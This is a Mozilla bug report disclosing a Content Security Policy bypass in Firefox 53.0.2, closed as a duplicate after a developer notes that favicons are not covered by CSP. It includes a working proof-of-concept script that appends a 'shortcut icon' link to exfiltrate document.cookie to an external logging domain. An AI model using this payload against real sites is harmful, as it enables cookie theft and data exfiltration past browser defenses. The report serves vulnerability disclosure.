Closed Bug 1363031 Opened 2 years ago Closed 2 years ago

Bypass of CSP unsafe-inline mode in Firefox 53.0.2

Categories

(Core :: DOM: Security, defect)

53 Branch
defect
Not set

Tracking

()

RESOLVED DUPLICATE of bug 1297156

People

(Reporter: evi1m0.bat, Unassigned)

Details

Attachments

(1 file)

Attached image 1.jpg
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36

Steps to reproduce:

We can use unprotected vectors to bypass the CSP defense.

PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php
---
CSP:
    header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:
    x = (new Date()).valueOf();
    document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";";

    ffn0t= document.head.appendChild(document.createElement("link"));
    ffn0t.rel = "shortcut icon";
    ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie;



Actual results:

Bypass


Expected results:

Bypass
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Of course, the closure of the unsafe-inline mode can also perform bypass code.
favicons are currently not governed by CSP in Firefox. They should be, since they can be specified by the document, but the content is not _in_ the document so it's a bit ambiguous.
Group: dom-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1297156
(In reply to Daniel Veditz [:dveditz] from comment #2)
> favicons are currently not governed by CSP in Firefox. They should be, since
> they can be specified by the document, but the content is not _in_ the
> document so it's a bit ambiguous.

hello, icon == shortcut,icon ?

I tested icon success rate is very low but shortcut icon can trigger stable.
You need to log in before you can comment on or make changes to this bug.